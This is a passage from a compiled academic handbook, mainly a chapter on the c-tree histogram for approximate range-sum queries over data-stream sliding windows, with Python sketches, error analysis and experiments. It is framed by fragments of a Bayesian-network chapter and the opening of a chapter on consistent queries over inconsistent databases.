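    i.e. (alpha_ijk + N_ijk) / (alpha_ij + N_ij) with alpha_ijk = alpha for all k."""
    n_ij = sum(1 for r in records
               if all(r[p] == v for p, v in zip(parents, parent_values)))
    n_ijk = sum(1 for r in records
                if r[child] == child_value
                and all(r[p] == v for p, v in zip(parents, parent_values)))
    alpha_ij = alpha * r_i          # sum of the hyperparameters for this configuration
    return (alpha + n_ijk) / (alpha_ij + n_ij)

# Toy records over binary variables B, C (parents) and A (child); values are illustrative.
records = [{"A": 1, "B": 1, "C": 0}] * 6 + [{"A": 0, "B": 1, "C": 0}] * 4

# With alpha = 1 the estimate is (1 + 6) / (2 + 10) ~ 0.58 rather than the raw 0.6,
# the two "virtual samples" pulling the estimate toward the uniform distribution.
print(cpt_entry(records, "A", 1, ["B", "C"], [1, 0], r_i=2))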
Learning the Structure: Score-Based Methods

Approximate Range Querying over Sliding Windows

MAIN FOCUS OF THE CHAPTER

The core of our proposal consists in a tree-like histogram, called c-tree, which is used to manage a sliding window of size w > 0. The histogram is built on top of the sliding window, by hierarchically summarizing the values occurring in it. In order to describe the c-tree we choose a constructive fashion. In particular, we define the initial configuration (at the time instant 0, coinciding with the origin of the data flow) and we show, at a generic instant t coinciding with the arrival of a new data item, how the c-tree is updated.

Initial Configuration. The c-tree histogram consists of:

1. A full binary tree T with n levels, where n is a parameter set according to the required data reduction (this issue will be discussed next in Section Experiments). Each leaf node N of T is associated with a range 〈l(N), u(N)〉 having size d = w/2^{n−1}, and the set of such ranges produces an equi-width partition of the array 〈1, w〉. In addition, we require that adjacent leaves correspond to adjacent ranges of 〈1, w〉 and that the left-most leaf corresponds to the range 〈1, d〉. We denote by val(N) the value of a given node N. At the initial state, all nodes of T contain the value 0.
2. A buffer, represented by a tuple B = 〈e, s〉 (0 ≤ e < d, s ≥ 0), where s represents the sum of the e most recent elements of the sliding window. Initially, e = s = 0.
3. An index P (1 ≤ P ≤ 2^{n−1}) identifying a leaf node of T. P is initially set to 1, corresponding to the left-most leaf of T.
We denote by H the above data structure. Next, we describe how H is updated when new data arrive.

State Transition. Let x_t be the data item arriving at instant t > 0. Then, we set e := (e+1) mod d and s := s + x_t. If e ≠ 0 (i.e., if the buffer B is not full), the updating of H halts here. Otherwise (i.e., e = 0), the value s (which summarizes the last d data) has to be stored in T and the buffer has to be emptied. The insertion of s in T is implemented as follows. Let δ = s − val(N_P), where N_P is the leaf of T identified by P. Then δ is added to val(N_P), so that val(N_P) becomes s, and δ is also added to all nodes belonging to the path from N_P to the root of H. Finally, both e and s of B are reset (i.e., they assume value 0) and P := (P mod 2^{n−1}) + 1 (this way, leaf nodes of the tree are managed as a cyclic array). Observe that the index P corresponds to the leaf node containing the least recent data, and that such data are replaced by the new incoming data. It is easy to see that each update operation requires O(log w) time, where w is the size of the sliding window.

Now we show an example of 3-level c-tree building and updating; a small executable sketch of the same procedure follows the example.

Example 1. Let 〈35, 51, 40, 118, 132, 21, 15, 16, 18, 29, ...〉 be the data stream ordered by increasing arrival time and let the sliding window size be 8; moreover, let d = w/2^{n−1} = 2. Initially, e = 0, s = 0, P = 1 and the value of all nodes in T is 0. The first data item coming from the stream is 35, thus e = 1 and s = 35. Since e ≠ 0, no other updating operation has to be done. Then the data item 51 arrives, thus e = 0 and s = 35 + 51 = 86. Since e = 0, the first leaf node of T is set to the value s, and all nodes belonging to the path between such leaf and the root are increased by δ = 86. Finally, P = 2, and both e and s are reset. In Figure 1(a) the resulting c-tree is shown. Therein (as well as in the other figures of the example), we have omitted buffer values since they are null. Moreover, right-hand child nodes are represented with the color grey. This is because, as we will explain in the next section, these nodes do not have to be saved, since they can be computed from the white nodes. For the first 8 data arrivals, updates proceed as before. In Figures 1(b) and 1(c) we report the snapshots after 4 and 8 updates, respectively. The index P has now wrapped around to the value 1. Now the data item 18 arrives, thus e = 1 and s = 18. At the next time instant, e = 0 and s = 47. Since e = 0, δ = 47 − 86 = −39 is added to the leaf node pointed to by P (that is, the first leaf), determining its new value 47. Moreover, the nodes belonging to the path between such leaf and the root are increased by δ. At this point, P assumes the value 2. The final c-tree is shown in Figure 1(d).
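The following sketch implements the initial configuration and the state transition just described, storing the full binary tree in an array; the class and variable names are mine, and the demo simply replays the stream of Example 1.

class CTree:
    """c-tree over a sliding window of size w, with n levels (2**(n-1) leaves)."""

    def __init__(self, n, w):
        self.n, self.w = n, w
        self.m = 2 ** (n - 1)           # number of leaves
        self.d = w // self.m            # leaf block size
        self.tree = [0] * (2 * self.m)  # heap layout: root at index 1, leaves at m..2m-1
        self.e, self.s = 0, 0           # buffer B = <e, s>
        self.P = 1                      # 1-based index of the leaf to overwrite next

    def update(self, x):
        self.e = (self.e + 1) % self.d
        self.s += x
        if self.e != 0:                 # buffer not full yet
            return
        node = self.m + self.P - 1      # array position of leaf N_P
        delta = self.s - self.tree[node]
        while node >= 1:                # add delta to N_P and to all its ancestors
            self.tree[node] += delta
            node //= 2
        self.P = (self.P % self.m) + 1
        self.s = 0

# Replay Example 1: n = 3 levels, window size w = 8, hence d = 2.
ct = CTree(n=3, w=8)
for x in [35, 51, 40, 118, 132, 21, 15, 16, 18, 29]:
    ct.update(x)

print(ct.tree[4:8])   # leaf values: [47, 158, 153, 31] (first leaf overwritten, delta = -39)
print(ct.tree[1])     # root holds the sum of the summarized blocks: 389
print(ct.P, ct.e)     # P = 2, buffer empty

Note that only the root, the left children, P, e, and s would actually be stored in the compressed representation described next; the array here keeps every node for clarity.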
C-Tree Representation

In this section we describe how the c-tree histogram is represented. Besides storing just the necessary nodes, we use a bit-saving based encoding in order to reduce the storage space. As already sketched in Example 1, each right-hand child node can be derived as the difference between the value of the parent node and the value of the sibling node. As a consequence, right-hand child node values do not have to be stored. In addition, we encode node values through variable-length representations. In particular:

1. The root is encoded by 32 bits (we assume that the overall sum of the sliding window data can anyway be represented by 32 bits with no scaling error).
2. The root's left child is represented by k bits (where k is a parameter suitably set — we will discuss this issue in Section Experiments).
3. All nodes which belong to the same level are represented by the same number of bits.
4. Nodes belonging to a level l, with 2 ≤ l ≤ n−1, are represented by one bit less than nodes belonging to level l−1.
Figure 1. Representation of both the construction and the update of the 3-level c-tree described in Example 1, after 2, 4, 8, and 10 data arrivals, respectively.
Substantially, the approach is based on the assumption that, on average, the sum of the occurrences in a given interval of the frequency vector is twice the sum of the occurrences in each half of that interval. This assumption is chosen as a heuristic criterion for designing the c-tree, and it explains the choice of reducing by 1 per tree level the number of bits used for representing node values. Clearly, the sum contained in a given node is represented as a fraction of the sum contained in the parent node. Observe that, in principle, a more space-efficient representation is possible, allowing a different number of bits for nodes belonging to the same level, depending on the actual values contained in the nodes. However, we would then have to deal with the spatial overhead due to these variable encodings. Hence, the reduction of 1 bit per level appears to be a reasonable compromise. Our approach is validated by previous results concerning histograms on persistent data (Buccafurri & Lax, 2003, 2004) and by work aimed at improving estimation inside histogram buckets (Buccafurri, Lax, Saccà, Pontieri & Rosaci, 2008).
Remark. We remark that the above bit-saving approach, although well suited for our tree-indexed histogram, is not applicable to non-hierarchical (i.e., "flat") histograms. Indeed, in the latter case, the scaling size used for representing numbers would be related to the overall sliding window sum, that is, the bucket values would be represented as fractions of this overall sum, with a considerable increase of the scaling error. One could argue that data-distribution-driven histograms, like V-Optimal (Jagadish et al., 1998), whose accuracy has been widely proven in the literature, could also be improved by building a tree index on top and by reducing the storage space by trivially applying our bit-saving approach. However, such indexed histograms induce a non-equi-width partition and, as a consequence, the reduction of 1 bit per level in the index of our approach would not be well-founded. Now, we discuss the approximation introduced by encoding values into the c-tree. First, observe that the encoding of a given node N with a certain number of bits, say i, is done in a standard fashion.
Now, let us denote by P the parent node of N. The value val(N) of the node N will in general not be recovered exactly: it will be affected by a certain scaling approximation. We denote by eval_i(N) the encoding of val(N) done with i bits and by ṽal_i(N) the approximation of val(N) obtained from eval_i(N). We have that:

eval_i(N) = Round((val(N)/val(P)) · (2^i − 1)).

Clearly, 0 ≤ eval_i(N) ≤ 2^i − 1. Concerning the approximation of val(N), it results:

ṽal_i(N) = (eval_i(N)/(2^i − 1)) · val(P).

We define the absolute error due to the i-bit encoding of the node N, having parent node P, as:

ε_a(val(N), val(P), i) = |val(N) − ṽal_i(N)|.

It can be easily verified that 0 ≤ ε_a(val(N), val(P), i) ≤ val(P)/(2^i − 1).

We conclude this section by analyzing both (1) the overall scaling error and (2) the storage space required by the c-tree, once the two input parameters are fixed, that is, n (the number of levels) and k (the number of bits used for encoding the left-hand child of the root). Concerning the scaling error, we explain how it is propagated over the path from the root to the leaves of the tree; the error for a stand-alone node is analyzed above. We can determine an upper bound of the worst-case error by considering the sum of the maximum scaling error at each stage. Assume that R is the maximum value appearing in the data stream and w is the sliding window size. According to the considerations above, since at the first level we use k bits for encoding node values, the maximum absolute error at this level is (R · w)/2^{k+1}. Going down to the second level cannot increase the maximum error: we double the scale granularity (since the coding is reduced by 1 bit), but the maximum allowed value is halved. More precisely, the maximum absolute error at the second level is (R · w)/2^k. Clearly, the same reasoning can be applied to the lower levels, so that the above claim is easily verified. In sum, the maximum absolute scaling error of the c-tree is (R · w)/2^{k+1}; interestingly, we observe that the error is independent of the tree depth n.

Concerning the storage space (in bits) required by the c-tree, we have:

(n − 1) + ⌈log(R · d)⌉ + ⌈log(d)⌉ + 32 + Σ_{h=0}^{n−2} (k − h) · 2^h   (1)

where d = w/2^{n−1}, the first three components of the sum account for P, s and e, respectively, while 32 + Σ_{h=0}^{n−2} (k − h) · 2^h is the space required for the saved nodes of T (recall that only left child nodes are stored). In Section Experiments we will discuss the setting of the parameters n and k. Next, we give details about range-sum query evaluation under the c-tree structure.
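As a quick sanity check of formula (1), the snippet below computes the space budget for the parameter values used later in the Experiments section (n = 7, k = 14); the particular choices of R and w here are assumptions made only for the sake of the calculation.

import math

def ctree_bits(n, k, w, R):
    """Storage (in bits) of the c-tree according to formula (1)."""
    d = w // 2 ** (n - 1)
    saved_nodes = 32 + sum((k - h) * 2 ** h for h in range(n - 1))
    return (n - 1) + math.ceil(math.log2(R * d)) + math.ceil(math.log2(d)) + saved_nodes

# n = 7 levels, k = 14 bits for the root's left child, a window of 256 values in [0, 100].
bits = ctree_bits(n=7, k=14, w=256, R=100)
print(bits, "bits =", bits / 32, "four-byte words")   # roughly the 22-word budget used later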
Evaluation of a Range-Sum Query In this section we describe the algorithm used for evaluating the answer to a range query Q(t1, t2) (0 ≤ t1 < t2 < w), that computes the sum of data arrived between time instants t – t1 and t – t2, respectively, where t denotes the current time instant. For example, if t1 = 0 and t2 = 5 it represents the sum of the 5 most recent data. C-tree allows us to reduce the storage space required for storing data of the sliding windows and, at the same time, to give fast yet approximate answers to range queries. As usual in this context, this approximation is the price we have to pay for having a small data structure to manage and for obtaining fast query answering. We now introduce some definitions that will be used in the algorithm.
Notations. Given a range query Q(t1, t2), with t1 > e:

1. Let η be the set of leaf nodes containing at least one data item involved in the range query. Let l_i = (P − ⌈(t_i − e)/d⌉) mod 2^{n−1}, for i = 1, 2, be the indexes of the two boundary leaf nodes L1 and L2. η consists of all leaf nodes succeeding L2 and preceding L1 (including both L1 and L2) in the ordering obtained by considering the leaf nodes as a cyclic array.
2. Given a non-leaf node N, let L(N) be the set of leaf nodes of the sub-tree having root N.
3. Given a leaf node N, we define I(N, Q) = (i/d) · val(N), where i is the number of data items stored by N that are involved in Q. I(N, Q) computes the contribution of a leaf node to a range query (by linear interpolation).
4. Let Q be the estimation of the range query computed by means of the c-tree.
First, suppose that t1 > e (recall that e is the number of data items in the buffer B), so that the range query does not involve data in the buffer B. The estimate Q is obtained by calling the function contribution on the root of the c-tree. The function contribution is shown below:

function contribution(N)
    if (N is a leaf) then
        return I(N, Q)
    endif
    c := 0
    for each child Nx of N
        if (L(Nx) ⊆ η) then
            c := c + val(Nx)
        else if (L(Nx) ∩ η ≠ ∅) then
            c := c + contribution(Nx)
        endif
    endfor
    return c
endfunction
The first test checks if N is a leaf node, and in such a case the function, before halting, computes the contribution of N to Q by linear interpolation. In case N is not a leaf node, it is tested if all nodes descending from Nx (denoting a child of N) are involved in the query. If this is the case, their contribution to the range query coincides with the value of Nx. In case not all nodes descending from Nx are involved in the query, but only some of them, their contribution is obtained by recursively calling the function on Nx. The algorithm performs, in the worst case, two descents from the root to two leaves. Thus, asymptotic computational cost of answering a range query is O(log w), where w is the window size. Note that the exact cost is upper bounded by n, where n = [log(w/d)] + 1 is the number of levels of the c-tree and d is the size of leaf nodes. In case t1 < t2 ≤ e, the range query involves only data in the buffer B and Q(t1, t2) = (t2 – t1) (s/e) (recall that s represents the sum of data buffered in B). Finally, in case t1 ≤ e < t2, we have that Q(t1, t2) = Q(t1, e) + Q(e, t2) that can be computed by exploiting the two above cases.
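The sketch below computes the same estimate directly from the leaf values, the buffer, and the pointer P, handling the three cases above uniformly; since every internal node stores the sum of its leaves, the recursive procedure described in the text returns the same value, only in O(log w) rather than by walking all leaves. The function and variable names are mine, and the demo replays the final state of Example 1.

def range_sum_estimate(leaves, P, e, s, d, t1, t2):
    """Estimate of Q(t1, t2): the sum of the (t2 - t1) most recent values,
    skipping the t1 most recent ones.  leaves[j] is the j-th leaf (0-based),
    P is the 1-based index of the oldest block, <e, s> is the buffer."""
    m = len(leaves)
    total = 0.0
    # Part of the query falling in the buffer (the e most recent values).
    if t1 < e and e > 0:
        total += (min(t2, e) - t1) * (s / e)
    # Part of the query falling in the summarized blocks, by linear interpolation.
    if t2 > e:
        a, b = max(t1, e) - e, t2 - e          # offsets inside the tree-stored data
        newest = (P - 2) % m                   # leaf holding the most recent block
        for j in range(a // d, (b - 1) // d + 1):
            cnt = min(b, (j + 1) * d) - max(a, j * d)
            total += (cnt / d) * leaves[(newest - j) % m]
    return total

# Final state of Example 1: leaves hold 47, 158, 153, 31; P = 2; empty buffer; d = 2.
leaves, P, e, s, d = [47, 158, 153, 31], 2, 0, 0, 2
print(range_sum_estimate(leaves, P, e, s, d, 0, 4))   # 78.0 (exact: 18 + 29 + 15 + 16)
print(range_sum_estimate(leaves, P, e, s, d, 0, 3))   # 62.5 (actual sum is 62)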
Experiments

We start this section by describing the features of the test bed we used for the experiments:

1. Available Storage Space. For the experiments conducted we have used 22 four-byte numbers for all techniques. According to (1) (given in Section C-tree Representation), this constraint has to be taken into account when the two basic parameters n and k of the c-tree are set. We have chosen to fix these parameters to the values n = 7 and k = 14 (we will motivate such a choice next in this section).
2. Techniques. We have compared our technique with (the motivations of such a choice are given in the Introduction):
   • V-Optimal (VO) (Jagadish et al., 1998), which produces 11 buckets; for each bucket both the upper bound and the value are stored.
   • Wavelet (WA) (Matias et al., 1998), constructed using the biorthogonal 2.2 decomposition of MATLAB 5.3, with 11 four-byte wavelet coefficients plus another 11 four-byte numbers for storing coefficient positions.
3. Data Streams. We have considered two kinds of streams:
   • Synthetic Data Streams, obtained by randomly generating 10,000 data values belonging to the range [0, 100].
   • Real-life Data Streams, retrieved from (University of California, 1993). Such data represent the maximum daily air temperature, stored by the station STBARBRA.A, in the County of Santa Barbara from 1994 to 2001. The size of the data is 2,922 and the range is from 10.6 to 38.3 degrees Celsius.
4. Query Set and Error Metrics. In our experiments, we use two different query sets in order to evaluate the effectiveness of the above mentioned techniques:
   • QS1 consists of all range queries having size [1, q] (1 ≤ q ≤ w),
   • QS2 is the set of all range queries having size Round(w/10), where, we recall, w is the size of the sliding window.
   At each time instant, we have measured the error E(t) produced by the techniques on the considered query set as the average of the relative errors, E(t) = (1/|Q|) · Σ_{i=1}^{|Q|} e_i^rel, where |Q| is the cardinality of the query set and e_i^rel = |S_i − S̃_i| / S_i is the relative error, S_i and S̃_i being, respectively, the actual answer and the estimated answer of the i-th query of the considered query set (a small computational sketch of this metric is given after this list). Finally, we have computed the average of the error E(t) over the entire data stream duration. After a suitable initial delay, sufficient to fill the sliding window, queries have been applied at each arrival of new data.
5. Sliding Window Size. In our experiments, we use sliding windows of size 64, 128, 256, 512 and 1024, which are dimensions frequently used for experiments in this context (Bulut, 2003; Das, 2003; Guha, 2002).
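For completeness, the error metric in item 4 amounts to the few lines below; the toy answer vectors are illustrative only.

def average_relative_error(actual, estimated):
    """E(t) = (1/|Q|) * sum_i |S_i - S~_i| / S_i over one query set."""
    assert len(actual) == len(estimated) and len(actual) > 0
    return sum(abs(s - s_est) / s for s, s_est in zip(actual, estimated)) / len(actual)

# Illustrative values: three queries whose true answers are 100, 50, 200.
print(average_relative_error([100, 50, 200], [90, 55, 200]))   # ~0.0667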
Now we consider the problem of selecting suitable values for both n and k, which are, we recall, the number of levels of the c-tree and the number of bits used for encoding the left child node of the root (for the successive levels, as already mentioned, we drop 1 bit per level), respectively. Observe that, according to the result about the error given in Section C-tree Representation, setting the parameter k also fixes the error due to the scaling approximation. We have performed a number of experiments on synthetic data in order to test the dependence of the error on the parameters n and k. Here we refer to the average relative error e_i^rel on query set 1. Figure 2(a) shows that the error decreases as n increases, and Figure 2(b) shows that the error decreases as k increases until k = 11 and then remains nearly constant. Indeed, the error consists of two components: (1) the error due to the interpolation inside the leaf nodes partially involved in the query, and (2) the scaling approximation. For k > 11, the second component is negligible, and the error keeps a quasi-constant trend since the first component depends only on n. Therefore, in order to reduce the error, we should set k to a value as large as possible, while still allowing us to represent the leaves with a sufficient number of bits (not too much lower than the threshold heuristically determined above).
Figure 2. Average relative error on query set versus n (representing the number of levels of the c-tree) and k (representing the number of bits used for encoding the left child node of the root).
Figure 3. The average relative error on query set 1 versus the sliding window size, by a comparison of different data reduction techniques.
However, for a fixed compression ratio, this may limit the depth of the tree and, thus, the resolution determined by the leaves. As a consequence, the error arising from linear interpolation done inside leaf nodes increases. In sum, the choice of k plays the role of solving the above trade-off. These criteria are employed in the experiments in order to choose the values of n and k, respectively, on the basis of the storage space amount.
Now we present results obtained by experiments. For each data set we have calculated the average relative error on both query set 1 and query set 2. In Figures 3(a) and 3(b) we have reported results obtained on real and synthetic data sets, by varying the sliding window size (we have considered sizes: 64, 128, 256, 512) and by using query set 1.
Figure 4. The average relative error on query set 2 versus the sliding window size, by a comparison of different data reduction techniques.
Figure 5. The average relative error on query set 1 versus the number of levels of the c-tree, evaluated for a window size of 256, 512 and 1024, respectively.
C-tree shows the best accuracy, with significant gaps especially with respect to Wavelet. Note that, in the case of a sliding window of size 64, the c-tree produces no error, since there is no discretization and, furthermore, a leaf node is encoded by 9 bits, which are sufficient to represent a single data value exactly.
In Figures 4(a) and 4(b) we have replicated the previous experiments on query set 2. Observe that, in this case, the accuracy of all techniques becomes worse than on query set 1, since the range query size is very small (indeed, each range query involves only 10% of the sliding window data). This comparison also shows the superiority of the c-tree over the other methods.
In Figures 5(a) and 5(b) we have studied the accuracy of the c-tree versus the number of levels, by setting k = 14 and by considering the sliding window sizes 256, 512 and 1024. Query set 1 has been used for these experiments. Finally, we observe that, thanks to the experiments conducted with query set 2 (see Figures 4(a) and 4(b)), we have verified that the behaviour of the c-tree is "macroscopically" independent of the position of the range query in the window. Macroscopically here means that, even though some queries can be privileged (for instance those involving only entire buckets), both the average and the variability of the query answer error are not biased. This basically reflects the equi-width nature of the c-tree histogram.
CONCLUSION

In this chapter we have presented a tree-like histogram suitable both to reduce sliding windows and to support fast approximate answers to arbitrary range-sum queries on them. Through a large set of experiments, the method has been successfully compared with other approaches. The histogram is designed to implement data stream pre-processing in a KDD process that exploits arbitrary hierarchical range-sum queries. As future work, we plan to investigate how our method can be exploited in order to support further kinds of queries useful in the context of data stream mining.
REFERENCES
Babcock, B., Babu, S., Datar, M., Motwani, R., & Widom, J. (2002). Models and issues in data stream systems. In Proceedings of the ACM SIGMOD-SIGACT-SIGART Symposium on Principles of Database Systems, 1-16.

Babcock, B., Datar, M., & Motwani, R. (2002). Sampling from a moving window over streaming data. In Proceedings of the Thirteenth Annual ACM-SIAM Symposium on Discrete Algorithms, 1-16.

Buccafurri, F., & Lax, G. (2003). Pre-computing approximate hierarchical range queries in a tree-like histogram. In Proceedings of the International Conference on Data Warehousing and Knowledge Discovery, 350-359.

Buccafurri, F., & Lax, G. (2004). Fast range query estimation by N-level tree histograms. Data & Knowledge Engineering Journal, 51(2), 257-275.

Buccafurri, F., Lax, G., Saccà, D., Pontieri, L., & Rosaci, D. (2008). Enhancing histograms by tree-like bucket indices. The VLDB Journal, The International Journal on Very Large Data Bases.

Bulut, A., & Singh, A. K. (2003). SWAT: Hierarchical stream summarization in large networks. In Proceedings of the International Conference on Data Engineering, 303-314.

Bulut, A., & Singh, A. K. (2005). A unified framework for monitoring data streams in real time. In Proceedings of the International Conference on Data Engineering, 44-55.

Charikar, M., Chen, K., & Farach-Colton, M. (2002). Finding frequent items in data streams. In Proceedings of the 29th International Colloquium on Automata, Languages and Programming, 693-703.

Chaudhuri, S., Motwani, R., & Narasayya, V. (1999). On random sampling over joins. In Proceedings of the ACM SIGMOD International Conference on Management of Data, 263-274.

Cohen, E., & Strauss, M. J. (2006). Maintaining time-decaying stream aggregates. Journal of Algorithms, 59(1), 19-36.

Cormode, G., & Garofalakis, M. (2005). Sketching streams through the net: Distributed approximate query tracking. In Proceedings of the 31st International Conference on Very Large Data Bases, 13-24.

Cormode, G., Muthukrishnan, S., & Rozenbaum, I. (2005). Summarizing and mining inverse distributions on data streams via dynamic inverse sampling. In Proceedings of the 31st International Conference on Very Large Data Bases, 25-36.

Das, A., Gehrke, J., & Riedewald, M. (2003). Approximate join processing over data streams. In Proceedings of the 2003 ACM SIGMOD International Conference on Management of Data, 40-51.

Datar, M., Gionis, A., Indyk, P., & Motwani, R. (2002). Maintaining stream statistics over sliding windows [Abstract]. In Proceedings of the 13th Annual ACM-SIAM Symposium on Discrete Algorithms, 635-644.

Dong, G., Han, J., Lakshmanan, L. V. S., Pei, J., Wang, H., & Yu, P. S. (2003, June). Online mining of changes from data streams: Research problems and preliminary results. Paper presented at the ACM SIGMOD Workshop on Management and Processing of Data Streams, San Diego, CA.

Feigenbaum, J., Kannan, S., Strauss, M., & Viswanathan, M. (2002). An approximate L1-difference algorithm for massive data streams. SIAM Journal on Computing, 32(1), 131-151.

Garofalakis, M., Gehrke, J., & Rastogi, R. (2002). Querying and mining data streams: You only get one look (tutorial). In Proceedings of the ACM SIGMOD International Conference on Management of Data, 61-72.

Gilbert, A. C., Kotidis, Y., Muthukrishnan, S., & Strauss, M. J. (2001). Surfing wavelets on streams: One-pass summaries for approximate aggregate queries. In Proceedings of the 2001 Conference on Very Large Databases, 79-88.

Guha, S., & Koudas, N. (2002). Approximating a data stream for querying and estimation: Algorithms and performance evaluation. In Proceedings of the 18th International Conference on Data Engineering, 567-576.

Guha, S., Koudas, N., & Shim, K. (2001). Data streams and histograms. In Proceedings of the Thirty-Third Annual ACM Symposium on Theory of Computing, 471-475.

Guha, S., Shim, K., & Woo, J. (2004). REHIST: Relative error histogram construction algorithms. In Proceedings of the 2004 Conference on Very Large Databases, 300-311.

Jagadish, H. V., Koudas, N., Muthukrishnan, S., Poosala, V., Sevcik, K. C., & Suel, T. (1998). Optimal histograms with quality guarantees. In Proceedings of the 24th International Conference on Very Large Data Bases, 275-286.

Koudas, N., Muthukrishnan, S., & Srivastava, D. (2000). Optimal histograms for hierarchical range queries (extended abstract). In Proceedings of the Nineteenth ACM SIGMOD-SIGACT-SIGART Symposium on Principles of Database Systems, 196-204.

Li, J., Maier, D., Papadimos, V., Tufte, K., & Tucker, P. A. (2005). No pane, no gain: Efficient evaluation of sliding-window aggregates over data streams. SIGMOD Record, 34(1), 39-44.

Lin, X., Lu, H., Yuan, Y., & Wang, W. (2005). Stabbing the sky: Efficient skyline computation over sliding windows. In Proceedings of the International Conference on Data Engineering, 502-513.

Manku, V. S., & Motwani, R. (2002). Approximate frequency counts over data streams. In Proceedings of the 28th International Conference on Very Large Data Bases, 346-357.

Matias, Y., Vitter, J. S., & Wang, M. (1998). Wavelet-based histograms for selectivity estimation. In Proceedings of the 1998 ACM SIGMOD International Conference on Management of Data, 448-459.

Matias, Y., Vitter, J. S., & Wang, M. (2000). Dynamic maintenance of wavelet-based histograms. In Proceedings of the 26th International Conference on Very Large Data Bases, 101-110.

University of California. (1993). California Weather Databases, Santa Barbara station records, 1993 [Data file]. Available from University of California Integrated Pest Management (UC-IPM) Web site, http://www.ipm.ucdavis.edu/calludt.cgi/WXSTATIONDATA?STN=STBARBRA.A
KEY TERMS

Bucket: An element obtained by partitioning the domain of an attribute X of a relation into non-overlapping intervals. Each bucket consists of a tuple 〈inf, sup, val〉 where val is an aggregate information (i.e., sum, average, count, and so on) about the tuples with value of X belonging to the interval (inf, sup).

Bucket-Based Histogram: A type of histogram whose construction is driven by the search of a suitable partition of the attribute domain into buckets.

Data Stream: Data that is structured and processed in a continuous flow, such as digital audio and video or data coming from digital sensors.

Data Stream Pre-Processing: The application, prior to the mining phase, of several methods aimed to improve the overall data mining results. Usually, it consists of (1) data cleaning, that is, a method for fixing missing values, outliers and possible inconsistent data, and (2) data reduction, that is, the application of any technique (affecting data representation) which is capable of saving storage space without compromising the possibility of inquiring compressed data.

Histogram: A set of buckets implementing a partition of the overall domain of a relation attribute.

Range Query: A query returning an aggregate information (such as sum, or average) about data belonging to a given interval of the domain.

Sliding Window: A sequence of the most recent values, arranged in arrival time order, that are collected from a data stream.

Wavelets: Mathematical transformations implementing hierarchical decomposition of functions, leading to the representation of functions through sets of real-number coefficients.
This work was previously published in Handbook of Research on Text and Web Mining Technologies, edited by M. Song and Y.-F. Wu, pp. 273-287, copyright 2009 by Information Science Reference (an imprint of IGI Global).
Chapter 7.3
Consistent Queries over Databases with Integrity Constraints Luciano Caroprese DEIS Universitá della Calabria, Italy Cristian Molinaro DEIS Universitá della Calabria, Italy Irina Trubitsyna DEIS Universitá della Calabria, Italy Ester Zumpano DEIS Universitá della Calabria, Italy
INTRODUCTION Integrating data from different sources consists of two main steps, the first in which the various relations are merged together, and the second in which some tuples are removed (or inserted) from the resulting database in order to satisfy integrity constraints. There are several ways to integrate databases or possibly distributed information sources, but whatever integration architecture we choose, the heterogeneity of the sources to be integrated causes subtle problems. In particular, the database obtained from the integration process
may be inconsistent with respect to integrity constraints, that is, one or more integrity constraints are not satisfied. Integrity constraints represent an important source of information about the real world. They are usually used to define constraints on data (functional dependencies, inclusion dependencies, etc.) and have, nowadays, a wide applicability in several contexts such as semantic query optimization, cooperative query answering, database integration, and view update. Since the satisfaction of integrity constraints cannot generally be guaranteed, if the database is obtained from the integration of different infor-
mation sources, in the evaluation of queries, we must compute answers that are consistent with the integrity constraints. The following example shows a case of inconsistency. Example 1: Consider the following database schema consisting of the single binary relation Teaches (Course, Professor) where the attribute Course is a key for the relation. Assume there are two different instances for the relations Teaches, D1={(c1,p1),(c2,p2)} and D2={(c1,p1),(c2,p3)}. The two instances satisfy the constraint that Course is a key, but from their union we derive a relation that does not satisfy the constraint since there are two distinct tuples with the same value for the attribute Course. In the integration of two conflicting databases simple solutions could be based on the definition of preference criteria such as a partial order on the source information or a majority criterion (Lin & Mendelzon, 1996). However, these solutions are not generally satisfactory, and more useful solutions are those based on (1) the computation of “repairs” for the database, and (2) the computation of consistent answers (Arenas, Bertossi, & Chomicki, 1999). The computation of repairs is based on the definition of minimal sets of insertion and deletion operations so that the resulting database satisfies all constraints. The computation of consistent answers is based on the identification of tuples satisfying integrity constraints and on the selection of tuples matching the goal. For instance, for the integrated database of Example 1, we have two alternative repairs consisting in the deletion of one of the tuples (c2,p2) and (c2,p3). The consistent answer to a query over the relation Teaches contains the unique tuple (c1,p1) so that we do not know which professor teaches course c2. Therefore, it is very important, in the presence of inconsistent data, not only to compute the set of consistent answers, but also to know which facts are unknown and if there are possible repairs for the database.
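A brute-force sketch of what "repairs" and "consistent answers" mean for Example 1: generate the candidate subsets of the merged relation, keep the maximal ones that satisfy the key constraint, and intersect them. The representation of tuples and the helper names are mine.

from itertools import combinations

def satisfies_key(rel):
    """Course (first component) must be a key of Teaches."""
    courses = [c for c, _ in rel]
    return len(courses) == len(set(courses))

def repairs(rel):
    """Maximal consistent subsets obtained by deleting tuples only."""
    candidates = [set(sub) for r in range(len(rel), -1, -1)
                  for sub in combinations(rel, r) if satisfies_key(set(sub))]
    return [c for c in candidates
            if not any(c < other for other in candidates)]   # keep maximal ones only

merged = {("c1", "p1"), ("c2", "p2"), ("c2", "p3")}           # union of D1 and D2 from Example 1
reps = repairs(merged)
print(reps)                          # two repairs, each dropping one of the tuples about c2
print(set.intersection(*reps))       # consistent answer: {("c1", "p1")}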
BACKGROUND

Several proposals considering the integration of databases as well as the computation of queries over inconsistent databases have been provided in the literature (Agarwal, Keller, Wiederhold, & Saraswat, 1995; Arenas et al., 1999; Arenas, Bertossi, & Chomicki, 2000; Bry, 1997; Dung, 1996; Greco & Zumpano, 2000; Lin, 1996; Lin & Mendelzon, 1996; Lembo, Lenzerini, & Rosati, 2002; Lenzerini, 2002; Wijsen, 2003). Most of the techniques for computing queries over inconsistent databases work for restricted cases, and only recently have there been proposals to consider more general constraints. This section provides an informal description of the main techniques proposed in the literature.

• Lin and Mendelzon (1996) proposed an approach taking into account the majority view of the knowledge bases in order to obtain a new relation that is consistent with the integrity constraints. The technique proposes a formal semantics to merge first order theories under a set of constraints. However, the "merging by majority" technique does not resolve conflicts in all cases, since information is not always present in the majority of the databases and, therefore, it is not always possible to choose between alternative values. Moreover, the use of the majority criterion involves discarding inconsistent data and hence the loss of potentially useful information.

